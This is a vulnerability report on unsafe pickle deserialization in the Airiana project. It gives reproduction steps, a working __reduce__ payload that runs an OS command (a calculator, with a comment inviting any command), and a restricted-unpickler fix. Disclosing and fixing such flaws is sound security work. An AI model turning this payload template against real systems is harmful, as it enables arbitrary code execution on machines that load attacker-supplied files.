### Critical Vulnerability Information

#### Vulnerability Type

- **Unsafe Deserialization**: Remote Code Execution (RCE) via `pickle.load()`.

#### Vulnerability Description

- The script loads data from the `coefficients.dat` file without validating its contents, using Python’s `pickle.load()` method.
- An attacker can replace the `.dat` file with a malicious payload to execute arbitrary code.

#### Vulnerable Code

```python
file = open("coefficients.dat", "rb")
a = pickle.load(file)
```

#### Reproduction Steps

1. Clone the repository:

   ```bash
   git clone https://github.com/BeamCtrl/Airiana
   ```

2. Navigate to the `Airiana` directory:

   ```bash
   cd Airiana
   ```

3. Use the following Python script to create a malicious `coefficients.dat` file:

   ```python
   import pickle
   import os

   class Evil:
       def __reduce__(self):
           return (os.system, ("gnome-calculator",))  # Replace with any OS command

   payload = pickle.dumps(Evil())
   with open("coefficients.dat", "wb") as f:
       f.write(payload)
   ```

4. Run the vulnerable script:

   ```bash
   python3 coef
   ```

5. Observe the result: The calculator or any other arbitrary system command will be executed.

#### Impact

- Attackers can exploit this vulnerability to execute arbitrary system commands, leading to Remote Code Execution (RCE).
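One way to close the `pickle.load()` path described above, as an added example that is not part of the Airiana code base: an unpickler that refuses every global lookup, so a `__reduce__`-style payload is rejected before anything is called. It assumes `coefficients.dat` holds only plain containers and numbers; `NoGlobalsUnpickler`, `load_coefficients` and `is_rejected` are hypothetical names.

```python
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup.

    dict, list, tuple, str, int, float, bool and None have their own
    opcodes and never reach find_class(), so plain numeric data still
    loads. Anything that needs a class or function to be resolved
    (which is what a __reduce__ payload relies on) is rejected first.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"blocked global {module}.{name} in coefficients file"
        )


def load_coefficients(data: bytes):
    """Deserialize untrusted bytes without resolving any callable."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """Return True when the restricted loader refuses the input."""
    try:
        load_coefficients(data)
    except pickle.UnpicklingError:
        return True
    return False


# Constructed sample inputs (assumed data shape, not taken from the project).
BENIGN = pickle.dumps({"a": [0.12, 3.4], "b": 7})


class _Probe:
    # Harmless stand-in with the same pickle shape as a __reduce__ payload:
    # it asks the loader to resolve and call len("abc").
    def __reduce__(self):
        return (len, ("abc",))


PAYLOAD_SHAPED = pickle.dumps(_Probe())

if __name__ == "__main__":
    print(load_coefficients(BENIGN))
    print("rejected:", is_rejected(PAYLOAD_SHAPED))
```

If the coefficients really are only numbers, storing them as JSON removes pickle from the loading path entirely.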